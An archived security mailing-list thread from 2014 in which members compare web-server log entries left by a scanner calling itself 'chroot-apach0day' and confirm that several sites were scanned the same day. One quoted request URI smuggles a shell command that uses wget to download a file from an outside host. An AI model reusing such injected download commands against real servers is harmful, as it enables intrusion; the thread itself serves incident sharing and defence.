PaulDotCom mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [Security Weekly] apache chroot 0day?

From: Xavier Mertens <xavier () rootshell be>
Date: Mon, 28 Jul 2014 17:24:26 +0200
+1 
One site was scanned at 07:55 (GMT+1)
The site was a mailman front-end. And yours? 

/x

--
"If the enemy leaves a door open, you must rush in." - Sun Tzu
PGP Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x42D006FD51AD7F2C

On 28 Jul 2014, at 16:30, Frank Michael <frankcmichael () gmail com> wrote:


Various sources confirming the same thing for other sites. All on 7/28. Keep an eye open. 

On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:


I've got a site that was scanned this morning by a tool that left these entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;

Anyone recognise it? That user agent isn't coming up in google searches.

Robin
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Attachment: signature.asc
Description: Message signed with OpenPGP using GPGMail

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
Previous By Date Next
Previous By Thread Next

Current thread: